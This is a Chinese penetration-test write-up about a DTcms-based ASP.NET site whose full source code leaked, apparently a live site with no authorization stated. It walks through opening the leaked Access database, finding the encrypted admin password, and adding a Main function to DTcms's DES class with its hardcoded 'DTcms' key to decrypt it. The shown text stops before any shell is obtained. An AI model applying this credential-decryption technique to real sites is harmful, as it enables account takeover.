一次有趣简短的渗透，记录下从信息泄露到Getshell的有趣过程，主要分享下思路以及基础的知识

0x0前言

朋友遇到一个站点，存在整站源码泄露，但是无法继续深入。再继续尝试突破现有情况中获取到了新的知识以及体验了有趣的过程，于是记录下过程

0x1简记

首先简单看了一下泄露的整站源码，发现是ASP.NET的源码，有ashx,cs,dll等后缀，由于从没接触过，于是查看了些资料学习了下.Net，发现aspx属于是前台文件，aspx.cs是属于后台文件，是C#代码，可以通过C#写很多模块功能并且编译成dll，然后提供给aspx.cs调用

0x2突破

学习完上述简单理论后，简单看了下目录结构，发现是DtCms，并且再App_Data中找到了数据库文件DtCmsdb.mdb
通过利用本地Office全家桶中的Microsoft Office Access打开

发现了后台管理员的账号密码，但是UserPwd的值是加密的，并且不是md5，于是暂且放弃了解密获取明文密码的思路，简单梳理下如何进一步突破

简单梳理：由于泄露获取到了源码，发现是DTCMS，找了下历史漏洞，发现有后台的，但是没有前台的，sql注入的口子也不对，数据库表中的AddTime也是2011年，直接相差了11年，且网页上的建站公司也是个人公司。猜测是根据Dtcms的核心功能源码改的一个站点，还是想从源码代审入手

其实上面的思考还是挺正常的，但是想着想着发现，既然有源码，那我不就可以跟踪登录口获取密码然后加密存入数据库的流程，密码的加密方式肯定在该流程中。找到密码的加密方式就可以写对应的解密脚本

于是在/Admin/login.aspx.cs中找到了对于后台登录密码的校验流程

首先简单判断账号密码是否为空，否则通过获取Session的值判断是否已登录，如果不为空，且未登录，则通过chkAdminLogin函数判断该用户对应的密码是否正确

这里的bll含义是DtCms.BLL.Administrator bll = new DtCms.BLL.Administrator();

在bin目录中找到DtCms.BLL.dll，但是看不到源码

于是Github搜索是否开源，找到了该Dll的源码 https://github.com/tengge1/DTcms/tree/master/DTcms.BLL

但是全局搜索字符串chkAdminLogin，没有任何一处匹配，且在/DTcms.Web/admin/login.aspx.cs中的校验密码的方式也不相同，到这里就断了，无法跟到chkAdminLogin函数，可能用的DTcms源码版本都不一样

于是再次回到上述源码，尝试直接搜索DESEncrypt关键词来找加密的源码，在/DTcms.Common/DESEncrypt.cs中找到DES加密解密的类，尝试在此基础上增加一个Main函数来编译解密该密码，代码如下

using System;
using System.Security.Cryptography;
using System.Text;
namespace DTcms.Common
{
/// <summary>
/// DES加密/解密类。
/// </summary>
public class DESEncrypt
{
#region ========加密========
/// <summary>
/// 加密
/// </summary>
/// <param name="Text"></param>
/// <returns></returns>
public static string Encrypt(string Text)
{
return Encrypt(Text, "DTcms");
}
/// <summary> 
/// 加密数据 
/// </summary> 
/// <param name="Text"></param> 
/// <param name="sKey"></param> 
/// <returns></returns> 
public static string Encrypt(string Text, string sKey)
{
DESCryptoServiceProvider des = new DESCryptoServiceProvider();
byte[] inputByteArray;
inputByteArray = Encoding.Default.GetBytes(Text);
des.Key = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(sKey, "md5").Substring(0, 8));
des.IV = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(sKey, "md5").Substring(0, 8));
System.IO.MemoryStream ms = new System.IO.MemoryStream();
CryptoStream cs = new CryptoStream(ms, des.CreateEncryptor(), CryptoStreamMode.Write);
cs.Write(inputByteArray, 0, inputByteArray.Length);
cs.FlushFinalBlock();
StringBuilder ret = new StringBuilder();
foreach (byte b in ms.ToArray())
{
ret.AppendFormat("{0:X2}", b);
}
return ret.ToString();
}
#endregion
#region ========解密========
/// <summary>
/// 解密
/// </summary>
/// <param name="Text"></param>
/// <returns></returns>
public static string Decrypt(string Text)
{
return Decrypt(Text, "DTcms");
}
/// <summary> 
/// 解密数据 
/// </summary> 
/// <param name="Text"></param> 
/// <param name="sKey"></param> 
/// <returns></returns> 
public static string Decrypt(string Text, string sKey)
{
DESCryptoServiceProvider des = new DESCryptoServiceProvider();
int len;
len = Text.Length / 2;
byte[] inputByteArray = new byte[len];
int x, i;
for (x = 0; x < len; x++)
{
i = Convert.ToInt32(Text.Substring(x * 2, 2), 16);
inputByteArray[x] = (byte)i;
}
des.Key = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(sKey, "md5").Substring(0, 8));
des.IV = ASCIIEncoding.ASCII.GetBytes(System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(sKey, "md5").Substring(0, 8));
System.IO.MemoryStream ms = new System.IO.MemoryStream();
CryptoStream cs = new CryptoStream(ms, des.CreateDecryptor(), CryptoStreamMode.Write);
cs.Write(inputByteArray, 0, inputByteArray.Length);
cs.FlushFinalBlock();
return Encoding.Default.GetString(ms.ToArray());
}
static void Main(string[] args)
{
/* 我的第一个 C# 程序 */
Console.WriteLine(Decrypt("42xxxxxxx"));
Console.ReadKey();
}
#endregion
}
}